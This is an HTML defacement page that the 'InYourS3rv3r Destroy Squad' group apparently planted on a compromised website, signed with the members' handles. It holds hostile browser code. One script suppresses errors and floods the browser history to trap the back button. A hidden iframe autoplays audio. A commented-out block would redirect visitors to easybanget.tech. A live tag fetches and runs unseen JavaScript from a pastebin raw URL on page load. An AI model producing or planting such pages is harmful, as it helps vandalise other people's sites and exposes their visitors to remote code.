<html>

<head>

<link href="https://fonts.googleapis.com/css?family=Germania+One" rel="stylesheet">

<link rel="icon" type="image/png" href="src="https://i.imgur.com/QwQoCGG.jpg" type="image/x-icon"/>

     <iframe width="0" height="0" src="https://2.top4top.net/m_122340u2b0.mp3" frameborder="0" allowfullscreen>

</iframe>

     <title>Hacked By InYourS3rv3r</title>

     <meta name="google-site-verification" content="Hacked By InYourS3rv3r/>

     <meta name="theme-color" content="black">

     <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>

     <meta name="description" content="We Will Make History Together!!">

     <meta name="author" content="Hacked By InYourS3rv3r Destroy Squad"/>

     <meta name="keywords" content="Hacked By InYourS3rv3r Destroy Squad"/>

     <meta name="googlebot" content="all"/>

     <meta name="robots" content="all" />

     <meta name="googlebot-news" content="all" />

     <meta name="google" content="notranslate"/>

     <meta name="og:title" content="Hacked By InYourS3rv3r">

     <meta property="og:image" content="https://i.ibb.co/MVMsRts/Squad.png"/>

     <link itemprop="thumbnailUrl" href="https://i.ibb.co/MVMsRts/Squad.png"/>

<script>

function ClearError() {return true;}window.onerror = ClearError;

	 (function () {	 for(var i = 0; i < 20; i++) {

	 history.pushState(null, document.title, window.location.href );

	 }

	 })(document, window, history);

</script>

</head>

<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" 	onselectstart="event.returnValue=false">

<div id="instructions"></div>

<canvas id="canvas"></canvas>

<center>

<img width="500px" height="500px" src="https://i.ibb.co/MVMsRts/Squad.png"/>

<h1>Touched By InYourS3rv3r<br><br>We Will Make History Together</h1><br>

<hr color="red"/>

<pre>DESTROY SQUAD OFFICIAL <br>|| | INYOURS3RV3R | CRUSHER | MA | TERKEJOED_12 | MR.XID | TU4N B4DUT |<br>| WANNABE_ID | XIENAN | INYOUR-KID | INYOUR_HEART | HACEN_09 |<br>| ATAHALA | INYOUR_NICKNAME | VITA || 

</center>

<!--<script type='text/javascript'>

//<![CDATA[

(function(){

setInterval(function(){

var redSites = [

  "https://www.easybanget.tech",

  "https://www.easybanget.tech",

  "https://www.easybanget.tech",

  "https://www.easybanget.tech",

  "https://www.easybanget.tech"

];

var randomLinks = redSites[Math.floor(Math.random()*redSites.length)];

window.location = randomLinks

},50000)

}())

//]]>

window.open("https://easybanget.tech", "_blank");

</script>-->

<script type="text/javascript" src="https://pastebin.com/raw/jPgZp7Ba"></script>

<style type="text/css">

@import url("http://fonts.googleapis.com/css?family=Germania+One");

body{

  	 overflow:hidden;

  	 display: flex;

  	 align-items: center;

  	 justify-content: center;

  	 margin:0;

  	 padding:0;

  	 width:100%;

  	 background-attachment:fixed;

  	 background-size:cover;

  	 background-color:#000;

  	 height:800px;

  	 

  	 }

  	 html, body, canvas, #instructions {

  	 position: absolute;

  	 width: 100%;

  	 height: 100%;

  	 }

  	 

h1{

	color: #fff;

	text-decoration: none;

	border-radius:0px;

	border:0px;

	font-family: 'Germania One', cursive;

	font-size:50px;

	margin:0px auto;

}

pre{

color:#fff;

text-decoration:none;

font-family: 'Germania One', cursive;

font-size:25px;

}

p{

color:#ff0000;

text-decoration:none;

font-family: 'Germania One', cursive;

font-size:30px;

}

a:hover {

	color: #000;

	text-decoration: none;

}

lamer{

position: absolute;

      top: 50%;

        left: 50%;

        transform: translate(-50%, -50%);

}

</style>

</body>

</html>










